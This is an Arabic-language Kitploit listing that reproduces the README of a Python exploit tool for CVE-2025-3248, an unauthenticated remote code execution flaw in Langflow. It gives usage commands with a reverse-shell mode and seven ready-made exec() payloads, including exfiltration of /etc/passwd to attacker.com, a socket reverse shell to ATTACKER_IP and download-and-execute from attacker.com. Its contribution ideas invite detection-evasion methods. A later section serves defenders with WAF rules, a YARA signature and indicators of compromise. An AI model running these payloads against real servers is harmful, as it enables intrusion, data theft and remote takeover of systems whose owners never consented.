Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-3248-exploit — إطار استغلال شامل بلغة بايثون لاختبار وإظهار CVE-2025-3248، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد غير مصادق عليها في إصدارات Langflow ≤ 1.3.0. | Kitploit
أدوات/GitHubGitHub/drackyjr/cve-2025-3248-exploit
ماسحات الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمرتطوير الحمولات
31منذ 9 أشهرلم تتم المراجعة بعد
GitHub
drackyjr/cve-2025-3248-exploit

cve-2025-3248-exploit

إطار استغلال شامل بلغة بايثون لاختبار وإظهار CVE-2025-3248، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد غير مصادق عليها في إصدارات Langflow ≤ 1.3.0.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-3248: ماسح ثغرة تنفيذ التعليمات البرمجية عن بعد (RCE) غير المصادق عليها في Langflow

License Python Status CVSS EPSS

إطار استغلال شامل بلغة Python لاختبار وإظهار CVE-2025-3248، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بعد (RCE) غير المصادق عليها في إصدارات Langflow ≤ 1.3.0.


🔴 نظرة عامة على الثغرة

CVE-2025-3248: حقن كود Langflow وتنفيذ الأوامر (RCE)

الخاصيةالقيمة
معرف CVECVE-2025-3248
المنتجLangflow
الإصدارات المتأثرة≤ 1.3.0
نوع الثغرةتنفيذ تعليمات برمجية عن بعد (RCE) غير مصادق عليه
ناقل الهجومالشبكة
المصادقة المطلوبةلا شيء
درجة CVSS9.8 (حرجة)
درجة EPSS92.57%
CWECWE-94 (التحكم غير السليم في توليد الكود)
النقطة الطرفية المعرضة/api/v1/validate/code

السبب الجذري

توجد الثغرة في نقطة API النهائية /api/v1/validate/code، التي تقبل كود بايثون عشوائي وتتحقق منه باستخدام دالة exec() غير الآمنة في بايثون دون تعقيم مدخلات أو وضع قيود صارمة. تستغل الثغرة سلوك بايثون حيث:

  1. يتم تقييم الزخارف (Decorators) فورًا أثناء تعريف الدالة
  2. يتم تنفيذ قيم الوسائط الافتراضية أثناء تحليل شجرة التركيب المجردة (AST)
  3. لا يوجد تحقق من صحة المدخلات لمنع تنفيذ الكود الخبيث

سلسلة الهجوم

root@kitploit:~
المهاجم → POST /api/v1/validate/code → exec() في بايثون → RCE
     ↓
   لا حاجة للمصادقة
     ↓
   كود بايثون عشوائي
     ↓
   تنفيذ أمر النظام

✨ الميزات

  • ✅ اكتشاف النقاط الطرفية: يحدد تلقائيًا حالات Langflow المعرضة
  • ✅ اختبار متعدد المراحل: 4 اختبارات تدريجية للثغرات
  • ✅ تنفيذ الأوامر: تنفيذ أوامر النظام التعسفية على الهدف
  • ✅ استخراج البيئة: استرجاع متغيرات البيئة والإعدادات
  • ✅ عمليات الملفات: اختبار قدرات القراءة والكتابة للملفات
  • ✅ دعم الشل العكسي: إنشاء جلسات شل عكسية تفاعلية
  • ✅ كشف الإصدار: تحديد معلومات إصدار Langflow
  • ✅ إخراج ملون: تحسين قابلية القراءة بألوان الطرفية
  • ✅ إدارة المهلات: مهلات طلب قابلة للتكوين
  • ✅ تجاوز SSL/TLS: دعم الشهادات الموقعة ذاتيًا

📦 المتطلبات

root@kitploit:~
Python >= 3.7
requests >= 2.25.0

تثبيت التبعيات

root@kitploit:~
pip install requests

اختياري (لسجل أفضل)

root@kitploit:~
pip install colorama  # For Windows color support

🚀 التثبيت

الطريقة الأولى: استنساخ من GitHub

root@kitploit:~
git clone https://github.com/drackyjr/cve-2025-3248-exploit.git
cd cve-2025-3248-exploit
pip install -r requirements.txt
chmod +x cve_2025_3248_test.py

📖 الاستخدام

الصيغة الأساسية

root@kitploit:~
python3 cve_2025_3248_test.py -t <target_url> [options]

أمثلة البدء السريع

1. فحص الثغرة الأساسي

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com

2. تنفيذ أمر مخصص

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com -c "whoami"

3. تنفيذ أوامر متعددة

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com -c "cat /etc/passwd"

4. استغلال الشل العكسي (اختبارات مصرح بها فقط)

الخطوة 1: بدء مستمع netcat على جهازك

root@kitploit:~
nc -lvnp 4444

الخطوة 2: تشغيل الأداة

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com --exploit --lhost YOUR_IP --lport 4444

مثال:

root@kitploit:~
python3 cve_2025_3248_test.py -t http://192.168.1.100:7860 --exploit --lhost 192.168.1.50 --lport 4444

5. فحص بمهلة مخصصة

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com --timeout 30

وسائط سطر الأوامر

root@kitploit:~
وسائط موضعية:
  لا شيء

وسائط اختيارية:
  -t, --target TARGET       عنوان URL للهدف (مثل http://target.com) [مطلوب]
  -c, --command COMMAND     الأمر المراد تنفيذه (الافتراضي: id)
  --timeout TIMEOUT         مهلة الطلب بالثواني (الافتراضي: 10)
  --exploit                 تفعيل وضع الاستغلال (الشل العكسي)
  --lhost LHOST            عنوان IP الخاص بك للشل العكسي
  --lport LPORT            المنفذ الخاص بك للشل العكسي
  -h, --help               عرض رسالة المساعدة هذه

💾 أشكال الحمولات

1. التنفيذ القائم على الزخرفة

root@kitploit:~
payload = {
    "code": """
@exec("import os; os.system('whoami')")
def vulnerable_function():
    pass
"""
}

2. تنفيذ الوسيطة الافتراضية

root@kitploit:~
payload = {
    "code": """
def test(arg=exec("__import__('subprocess').check_output(['id'])")):
    pass
"""
}

3. تسريب البيانات

root@kitploit:~
payload = {
    "code": """
def test(x=exec("import requests; requests.post('http://attacker.com/exfil', data=open('/etc/passwd').read())")):
    pass
"""
}

4. الشل العكسي (سطر واحد)

root@kitploit:~
payload = {
    "code": """
def shell(x=exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])")):
    pass
"""
}

5. عمليات قراءة الملفات

root@kitploit:~
payload = {
    "code": """
def read_file(x=exec("print(open('/etc/passwd').read())")):
    pass
"""
}

6. تعداد متغيرات البيئة

root@kitploit:~
payload = {
    "code": """
def enum_env(x=exec("import os; print('\\n'.join([f'{k}={v}' for k,v in os.environ.items()]))")):
    pass
"""
}

7. تحميل وتنفيذ

root@kitploit:~
payload = {
    "code": """
def download_exec(x=exec("import urllib.request; exec(urllib.request.urlopen('http://attacker.com/payload.py').read())")):
    pass
"""
}

🔍 الكشف والتخفيف

للمدافعين

إجراءات فورية

  1. ترقية Langflow

    root@kitploit:~
    pip install langflow>=1.3.0
    # or
    docker pull langflow:latest
    
  2. تقييد الوصول إلى الشبكة

    root@kitploit:~
    # Nginx reverse proxy - حظر النقطة الطرفية المعرضة
    location /api/v1/validate/code {
        deny all;
    }
    
  3. تطبيق المصادقة

    root@kitploit:~
    # إضافة وسيط مصادقة
    @app.middleware("http")
    async def auth_middleware(request, call_next):
        if "/api/v1/validate/code" in request.url.path:
            if not verify_auth(request):
                return JSONResponse(status_code=401)
        return await call_next(request)
    

قواعد جدار الحماية لتطبيقات الويب (WAF)

قاعدة ModSecurity:

root@kitploit:~
SecRule ARGS:code "@contains exec" "id:1001,phase:2,deny"
SecRule ARGS:code "@contains subprocess" "id:1002,phase:2,deny"
SecRule ARGS:code "@contains __import__" "id:1003,phase:2,deny"
SecRule ARGS:code "@contains os.system" "id:1004,phase:2,deny"

قواعد الكشف

توقيع YARA:

root@kitploit:~
rule CVE_2025_3248_Langflow_RCE {
    strings:
        $api_path = "/api/v1/validate/code"
        $exec = "exec("
        $subprocess = "subprocess"
        $os_system = "os.system"
    condition:
        $api_path and any of ($exec, $subprocess, $os_system)
}

المراقبة والتسجيل

root@kitploit:~
# مراقبة الطلبات المشبوهة
tail -f /var/log/nginx/access.log | grep "/api/v1/validate/code"

# تنبيه عند طلبات POST إلى النقطة الطرفية المعرضة
auditctl -w /var/lib/langflow -p wa -k langflow_changes

مؤشرات الاختراق (IoCs)

  • طلبات POST غير عادية إلى /api/v1/validate/code
  • عمليات مأخوذة من Langflow بأسماء مشبوهة
  • اتصالات صادرة غير متوقعة من خادم Langflow
  • ملفات تم إنشاؤها بأوقات غير عادية في /tmp
  • تنفيذ عمليات فرعية لبايثون من عملية Langflow
  • فشل في المصادقة يتبعه طلبات API
  • ارتفاع في استخدام CPU/الذاكرة من حاوية Langflow

🔬 التحليل الفني

كيف تعمل الثغرة

سلسلة الثغرة تعمل كما يلي:

root@kitploit:~
# Attacker sends this payload:
POST /api/v1/validate/code HTTP/1.1
Content-Type: application/json

{
    "code": "def func(x=exec('import os; os.system(\"whoami\")')): pass"
}

# Server processes it:
exec(code)  # ← Dangerous! No sanitization

# During AST parsing, the default argument is evaluated:
# exec('import os; os.system("whoami")')

# Result: Arbitrary command execution

لماذا تعمل الزخارف

سلوك بايثون مع الزخارف أثناء تعريف الدالة:

root@kitploit:~
# This code gets executed immediately:
@decorator_expression
def my_function():
    pass

# Which means this payload executes the code:
@exec("malicious_code_here")
def vulnerable_function():
    pass

لماذا تعتبر حرجة

  1. لا حاجة للمصادقة: يمكن لأي شخص الوصول إلى النقطة الطرفية
  2. قابل للوصول عبر الشبكة: يمكن استغلاله عن بعد
  3. وصول كامل للنظام: ينفذ بصلاحيات عملية Langflow
  4. لا تحقق من المدخلات: تنفيذ كود مباشر
  5. منتشر على نطاق واسع: يُستخدم في بيئات الإنتاج
  6. توفر استغلال عالي: براهين إثبات المفهوم عامة متاحة

📊 الجدول الزمني للثغرة

التاريخالحدث
2025-04-06اكتشاف الثغرة والإبلاغ عنها لفريق Langflow
2025-04-17إصدار استغلال عام (Exploit-DB)
2025-05-14إصدار تنبيه تفشي من FortiguardLabs
2025-05-21نشر تحليل Zscaler ThreatLabz
2025-05-22إبلاغ RecordedFuture عن استغلال نشط
2025-06-16إبلاغ TrendMicro عن استغلال بوت نت FLODRIC
2025-06-17نشر تحليل شامل من OffSec
2025-11-05إدخال قاعدة بيانات ثغرات SentinelOne
2025-11-20ملاحظة استمرار محاولات الاستغلال

🛡️ قائمة فحص الاختبار الدفاعي

عند إجراء اختبار أمني مصرح به:

  • الحصول على إذن كتابي قبل الاختبار
  • توثيق جميع أنشطة الاختبار
  • استخدام بيئات اختبار معزولة عند الإمكان
  • تجنب استغلال أنظمة الإنتاج دون ضرورة
  • تنظيف أي آثار (ملفات، عمليات) تم إنشاؤها أثناء الاختبار
  • الإبلاغ عن النتائج بمسؤولية للمنظمة المستهدفة
  • اتباع ممارسات الإفصاح المسؤول
  • الحفاظ على سرية نتائج الاختبار

📚 المراجع

  • مدونة OffSec: تحليل CVE-2025-3248
  • SentinelOne: حقن كود Langflow وتنفيذ الأوامر
  • Zscaler ThreatLabz: ثغرة RCE في Langflow
  • TrendMicro: استغلال بوت نت FLODRIC
  • RecordedFuture: تقرير الاستغلال النشط
  • Exploit-DB: Langflow 1.3.0 RCE
  • GitHub Advisories: GHSA-c995-4fw3-j39m


🤝 المساهمة

المساهمات مرحب بها! يُرجى اتباع هذه الإرشادات:

  1. عمل نسخة (Fork) من المستودع
  2. إنشاء فرع ميزة (git checkout -b feature/amazing-feature)
  3. حفظ التغييرات (git commit -m 'إضافة ميزة رائعة')
  4. دفع التغييرات إلى الفرع (git push origin feature/amazing-feature)
  5. فتح طلب سحب (Pull Request)

أفكار للمساهمة

  • أشكال حمولات إضافية
  • تقنيات استغلال بديلة
  • طرق تجنب الكشف
  • استراتيجيات تخفيف
  • تحسينات في التوثيق
  • إصلاحات للأخطاء


⚠️ إخلاء المسؤولية

إشعار قانوني هام:

هذه الأداة متوفرة لأغراض تعليمية واختبار أمني مصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وينتهك قوانين تشمل:

  • قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) - الولايات المتحدة
  • قانون إساءة استخدام الكمبيوتر - المملكة المتحدة
  • قانون تكنولوجيا المعلومات (ITA) - الهند
  • قوانين مماثلة في منطقتك القضائية

أنت وحدك المسؤول عن:

  • ✅ الحصول على إذن كتابي صريح من مالكي النظام قبل الاختبار
  • ✅ ضمان امتثال جميع الأنشطة للقوانين المحلية والدولية
  • ✅ استخدام هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن باختبارها
  • ✅ الحفاظ على سرية نتائج الأمان
  • ✅ اتباع ممارسات الإفصاح المسؤول
  • ✅ عدم استخدام هذه الأداة لأغراض ضارة

باستخدام هذه الأداة، فإنك توافق على:

  • عدم استخدامها للوصول غير المصرح به أو التلف
  • تحمل المسؤولية القانونية الكاملة عن أفعالك
  • تعويض المبتكرين وإخلاء مسؤوليتهم من أي التزام
  • الامتثال لجميع القوانين واللوائح المعمول بها

المبتكرون والمساهمون لا يتحملون أي مسؤولية عن سوء استخدام هذه الأداة.

📖 موارد إضافية

مواد تعليمية

  • حقن الكود من OWASP
  • CWE-94: التحكم غير السليم في توليد الكود
  • أمان بايثون: مخاطر exec()
  • تقنيات الشل العكسي

آخر تحديث: 21 نوفمبر 2025


root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║  CVE-2025-3248: ماسح ثغرة Langflow RCE v1.0              ║
║  استخدم بمسؤولية - اختبارات مصرح بها فقط                  ║
╚═══════════════════════════════════════════════════════════╝
تنزيل الأداة